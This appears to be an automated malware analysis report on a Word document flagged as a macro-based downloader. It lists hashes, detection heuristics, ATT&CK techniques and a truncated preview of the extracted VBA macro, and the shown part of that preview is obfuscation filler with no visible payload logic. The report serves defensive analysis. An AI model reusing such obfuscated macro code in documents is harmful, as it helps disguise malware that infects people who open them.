Office (OLE) malware analysis — malicious · 4548e0836dabf4cd

MALICIOUS

Office (OLE)

101.5 KB Created: 2017-08-30 21:36:00 Authoring application: Microsoft Office Word First seen: 2018-08-15

MD5: 6b6052d87ebdb24b1b32512a1256496c SHA-1: cb5ed8f16e600c853e2f4c930c90ceb279d5d997 SHA-256: 4548e0836dabf4cd7c924e9f29eae89143b5285377cb2c1c5ed6396b748c0d23

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The file is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. ClamAV identifies it as 'Doc.Macro.VBSDownloader-6336817-0', strongly suggesting its purpose is to download and execute a secondary payload. The presence of the AutoOpen macro and the CreateObject call are common indicators of macro-based malware downloaders.

Heuristics 7

ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17564 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17564 bytes
SHA-256: `f3fc4bb77d37012e29a046383f28e43b7caa65a413fa2d2e76cf9ce8a7e8d963`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function ArsRSUh() spWywkz = 4192 Dim FFXgwCLyNSr(4192) FFXgwCLyNSr(1697) = CPGBgXZNW FFXgwCLyNSr(3200) = RLvCbFuMD FFXgwCLyNSr(1106) = BapYEBNPvSe FFXgwCLyNSr(1820) = FwXgusde FFXgwCLyNSr(3192) = XdfgDef FFXgwCLyNSr(1131) = EvkUcWdkaHM FFXgwCLyNSr(1568) = kVrhuCvENVm FFXgwCLyNSr(2197) = LYWmmsSGF FFXgwCLyNSr(295) = sMBwPUPk FFXgwCLyNSr(869) = ytSgAfDUN FFXgwCLyNSr(1817) = CapSUdZMHHN FFXgwCLyNSr(209) = wnCNmEKRuA FFXgwCLyNSr(1243) = FdcrSNCpxNH FFXgwCLyNSr(1964) = ggRrAAf FFXgwCLyNSr(2670) = cKHpkafXVUP FFXgwCLyNSr(2985) = uNCmLXadFR FFXgwCLyNSr(463) = kCgEctbLY FFXgwCLyNSr(1679) = SgxmKfyAWA FFXgwCLyNSr(271) = kkTeWVwK gVaHPrb = "gezdcbnS" ANSgrXe = "KGctbmeX" HYyKpGMvbP = "kgMGbykYND" dPDFnrxRSK = "nCmYbKFerG" dWZUvMgpFwT = "yNwRBanwh" FyDStNGHz = "xgBYPnY" GGxxfSk = "ZPhSBATcWeU" xKkyBhFD = "szysuwxMP" XpGGFrsm = "zaFnrypuSc" sAXcxVLaUW = "VauFGTskCA" kxbNSUn = "kfdLfhD" vmHHrDZCM = "KbwBGSLAE" GnDGvNyVW = "aHTbDxkC" FewPRsZpD = "eUCMFUm" eBuyzWaDTC = "tbSuahmbF" PzxRmXeWXSD = "psNtZmgkG" VEfYrsrKb = "MhBZTYKv" exPeDdNxGFn = "WXWyvPaVG" rhYEKFdfkED = "mGtzreFNb" End Function Function tzxrKeRTGk() sbDEnMMud = 172 Dim dHyuPCmXC(172) dHyuPCmXC(119) = DNpkWNWf dHyuPCmXC(83) = PMyzcYYfdF dHyuPCmXC(127) = tKbEdPpTcx dHyuPCmXC(69) = cnhhWGays dHyuPCmXC(116) = hmrNByr dHyuPCmXC(129) = htfpdchT dHyuPCmXC(157) = ceCvYrbb dHyuPCmXC(79) = HAfawMZcrKE dHyuPCmXC(143) = GNZXVRsU dHyuPCmXC(117) = pcuyfRbu dHyuPCmXC(143) = fDvzKKbepGC dHyuPCmXC(84) = DVNzEccsmm dHyuPCmXC(94) = AhUapxvMNv dHyuPCmXC(159) = sDdBwKCXswp dHyuPCmXC(155) = zFfkLUkPZ dHyuPCmXC(123) = nyVEsHwRr dHyuPCmXC(144) = DrRCfLCXdnr dHyuPCmXC(131) = vxTbhbyddAw dHyuPCmXC(139) = eayCykzZAG TFvvezWgKN = "yWGDNXWX" WKDSaBLzny = "TybTDWS" zknMhEtgx = "gShyUPHrvp" SmhGRMupW = "hRxGDVx" PxbeRkuFLC = "xCWCvWR" DnMyZKaPUN = "MLDaKpY" UubTwxgpE = "GEuPNgGXwc" pBMAaWGDk = "pNNHwUkryb" GHWyAzLrDKH = "byHsaLpS" umNUPVvVmyF = "CBVhVHk" wPKzgdmkbPR = "rGMeCnpWkg" XunhGsUm = "AXfHcemKcf" wTLTtNvPY = "GADrXSyvH" treNbfhS = "vbcbSEbF" chwyyDZA = "yUBesphfnS" chTbHftdBW = "xZXdTYaRd" MffpEattm = "kEuerYnY" LcWVHaMcxV = "DsTbAXvZ" End Function Function ybeLHvC() fUsUGBdbcdc = 4338 Dim ehYFMLyaGMg(4338) ehYFMLyaGMg(1954) = ngHSRADvtgZ ehYFMLyaGMg(500) = SbwysDyp ehYFMLyaGMg(2579) = MPrPakMrNV ehYFMLyaGMg(2578) = frYGGkcM ehYFMLyaGMg(845) = FYcdFeS ehYFMLyaGMg(1674) = tMHZFMyb ehYFMLyaGMg(1724) = bgSZbLGuDZ ehYFMLyaGMg(2344) = HMhLhUwxUP ehYFMLyaGMg(138) = esadmpDS ehYFMLyaGMg(888) = ZxvDPkNAA ehYFMLyaGMg(3687) = hDfrPff ehYFMLyaGMg(3503) = skyBWxyAZ ehYFMLyaGMg(3805) = KRXAdywBpax ehYFMLyaGMg(1223) = FxwfcpDhpd ehYFMLyaGMg(115) = VHLYaGk ehYFMLyaGMg(2894) = XhMGDVpNWDW ehYFMLyaGMg(4128) = RnwdVUuHy ehYFMLyaGMg(4165) = vsrfxNAVuE ehYFMLyaGMg(1343) = DtWnpEh ehYFMLyaGMg(3267) = pUpnPEazNh ehYFMLyaGMg(1723) = TrVANtWgPZ ehYFMLyaGMg(2640) = bdPCahPaeV ehYFMLyaGMg(926) = fKTkaUBBAkp zufAfeM = "vkLfPRRY" vfxsxbKbFm = "SydUyKg" zbTeTUzLBTR = "MdpLbyr" ykcfeZTUps = "AABEpEC" NHMHrZK = "zypsKyM" ZavGWrTnx = "VLeuFGDkD" hkABzpFSYS = "TSygKSkp" fkvmAaBt = "nSsbEYFgZtE" LXXZBeyANfS = "NYcbRZgN" cwUTLeMp = "TmruTgnC" htdzXEGp = "WffPpsTZh" aSEHUBDnxy = "wsybhpUa" End Function Function RcVNnmMGBV() tbzZXvdDt = 3677 Dim HFAbKggU(3677) HFAbKggU(2412) = GaMezczDDU HFAbKggU(964) = YMSfUGNs HFAbKggU(3491) = KBzsHesms HFAbKggU(748) = fhXSBZGTHuX HFAbKggU(3431) = UTsxWkwwzV HFAbKggU(3426) = nyFZuPwv HFAbKggU(508) = wKecbXNSe HFAbKggU(93) = fkdhadDA HFAbKggU(1806) = ftcZvtku HFAbKggU(3237) = LkLNNngzkdC HFAbKggU(2571) = aNKdytR HFAbKggU(2031) = ... (truncated)

SHA-256: f3fc4bb77d37012e29a046383f28e43b7caa65a413fa2d2e76cf9ce8a7e8d963

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Function ArsRSUh()
spWywkz = 4192
Dim FFXgwCLyNSr(4192)
FFXgwCLyNSr(1697) = CPGBgXZNW
 FFXgwCLyNSr(3200) = RLvCbFuMD
 FFXgwCLyNSr(1106) = BapYEBNPvSe
 FFXgwCLyNSr(1820) = FwXgusde
 FFXgwCLyNSr(3192) = XdfgDef
 FFXgwCLyNSr(1131) = EvkUcWdkaHM
 FFXgwCLyNSr(1568) = kVrhuCvENVm
 FFXgwCLyNSr(2197) = LYWmmsSGF
 FFXgwCLyNSr(295) = sMBwPUPk
 FFXgwCLyNSr(869) = ytSgAfDUN
 FFXgwCLyNSr(1817) = CapSUdZMHHN
 FFXgwCLyNSr(209) = wnCNmEKRuA
 FFXgwCLyNSr(1243) = FdcrSNCpxNH
 FFXgwCLyNSr(1964) = ggRrAAf
 FFXgwCLyNSr(2670) = cKHpkafXVUP
 FFXgwCLyNSr(2985) = uNCmLXadFR
 FFXgwCLyNSr(463) = kCgEctbLY
 FFXgwCLyNSr(1679) = SgxmKfyAWA
 FFXgwCLyNSr(271) = kkTeWVwK
 gVaHPrb = "gezdcbnS"
 ANSgrXe = "KGctbmeX"
 HYyKpGMvbP = "kgMGbykYND"
 dPDFnrxRSK = "nCmYbKFerG"
 dWZUvMgpFwT = "yNwRBanwh"
 FyDStNGHz = "xgBYPnY"
 GGxxfSk = "ZPhSBATcWeU"
 xKkyBhFD = "szysuwxMP"
 XpGGFrsm = "zaFnrypuSc"
 sAXcxVLaUW = "VauFGTskCA"
 kxbNSUn = "kfdLfhD"
 vmHHrDZCM = "KbwBGSLAE"
 GnDGvNyVW = "aHTbDxkC"
 FewPRsZpD = "eUCMFUm"
 eBuyzWaDTC = "tbSuahmbF"
 PzxRmXeWXSD = "psNtZmgkG"
 VEfYrsrKb = "MhBZTYKv"
 exPeDdNxGFn = "WXWyvPaVG"
 rhYEKFdfkED = "mGtzreFNb"
 End Function
Function tzxrKeRTGk()
sbDEnMMud = 172
Dim dHyuPCmXC(172)
dHyuPCmXC(119) = DNpkWNWf
 dHyuPCmXC(83) = PMyzcYYfdF
 dHyuPCmXC(127) = tKbEdPpTcx
 dHyuPCmXC(69) = cnhhWGays
 dHyuPCmXC(116) = hmrNByr
 dHyuPCmXC(129) = htfpdchT
 dHyuPCmXC(157) = ceCvYrbb
 dHyuPCmXC(79) = HAfawMZcrKE
 dHyuPCmXC(143) = GNZXVRsU
 dHyuPCmXC(117) = pcuyfRbu
 dHyuPCmXC(143) = fDvzKKbepGC
 dHyuPCmXC(84) = DVNzEccsmm
 dHyuPCmXC(94) = AhUapxvMNv
 dHyuPCmXC(159) = sDdBwKCXswp
 dHyuPCmXC(155) = zFfkLUkPZ
 dHyuPCmXC(123) = nyVEsHwRr
 dHyuPCmXC(144) = DrRCfLCXdnr
 dHyuPCmXC(131) = vxTbhbyddAw
 dHyuPCmXC(139) = eayCykzZAG
 TFvvezWgKN = "yWGDNXWX"
 WKDSaBLzny = "TybTDWS"
 zknMhEtgx = "gShyUPHrvp"
 SmhGRMupW = "hRxGDVx"
 PxbeRkuFLC = "xCWCvWR"
 DnMyZKaPUN = "MLDaKpY"
 UubTwxgpE = "GEuPNgGXwc"
 pBMAaWGDk = "pNNHwUkryb"
 GHWyAzLrDKH = "byHsaLpS"
 umNUPVvVmyF = "CBVhVHk"
 wPKzgdmkbPR = "rGMeCnpWkg"
 XunhGsUm = "AXfHcemKcf"
 wTLTtNvPY = "GADrXSyvH"
 treNbfhS = "vbcbSEbF"
 chwyyDZA = "yUBesphfnS"
 chTbHftdBW = "xZXdTYaRd"
 MffpEattm = "kEuerYnY"
 LcWVHaMcxV = "DsTbAXvZ"
 End Function
Function ybeLHvC()
fUsUGBdbcdc = 4338
Dim ehYFMLyaGMg(4338)
ehYFMLyaGMg(1954) = ngHSRADvtgZ
 ehYFMLyaGMg(500) = SbwysDyp
 ehYFMLyaGMg(2579) = MPrPakMrNV
 ehYFMLyaGMg(2578) = frYGGkcM
 ehYFMLyaGMg(845) = FYcdFeS
 ehYFMLyaGMg(1674) = tMHZFMyb
 ehYFMLyaGMg(1724) = bgSZbLGuDZ
 ehYFMLyaGMg(2344) = HMhLhUwxUP
 ehYFMLyaGMg(138) = esadmpDS
 ehYFMLyaGMg(888) = ZxvDPkNAA
 ehYFMLyaGMg(3687) = hDfrPff
 ehYFMLyaGMg(3503) = skyBWxyAZ
 ehYFMLyaGMg(3805) = KRXAdywBpax
 ehYFMLyaGMg(1223) = FxwfcpDhpd
 ehYFMLyaGMg(115) = VHLYaGk
 ehYFMLyaGMg(2894) = XhMGDVpNWDW
 ehYFMLyaGMg(4128) = RnwdVUuHy
 ehYFMLyaGMg(4165) = vsrfxNAVuE
 ehYFMLyaGMg(1343) = DtWnpEh
 ehYFMLyaGMg(3267) = pUpnPEazNh
 ehYFMLyaGMg(1723) = TrVANtWgPZ
 ehYFMLyaGMg(2640) = bdPCahPaeV
 ehYFMLyaGMg(926) = fKTkaUBBAkp
 zufAfeM = "vkLfPRRY"
 vfxsxbKbFm = "SydUyKg"
 zbTeTUzLBTR = "MdpLbyr"
 ykcfeZTUps = "AABEpEC"
 NHMHrZK = "zypsKyM"
 ZavGWrTnx = "VLeuFGDkD"
 hkABzpFSYS = "TSygKSkp"
 fkvmAaBt = "nSsbEYFgZtE"
 LXXZBeyANfS = "NYcbRZgN"
 cwUTLeMp = "TmruTgnC"
 htdzXEGp = "WffPpsTZh"
 aSEHUBDnxy = "wsybhpUa"
 End Function
Function RcVNnmMGBV()
tbzZXvdDt = 3677
Dim HFAbKggU(3677)
HFAbKggU(2412) = GaMezczDDU
 HFAbKggU(964) = YMSfUGNs
 HFAbKggU(3491) = KBzsHesms
 HFAbKggU(748) = fhXSBZGTHuX
 HFAbKggU(3431) = UTsxWkwwzV
 HFAbKggU(3426) = nyFZuPwv
 HFAbKggU(508) = wKecbXNSe
 HFAbKggU(93) = fkdhadDA
 HFAbKggU(1806) = ftcZvtku
 HFAbKggU(3237) = LkLNNngzkdC
 HFAbKggU(2571) = aNKdytR
 HFAbKggU(2031) = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.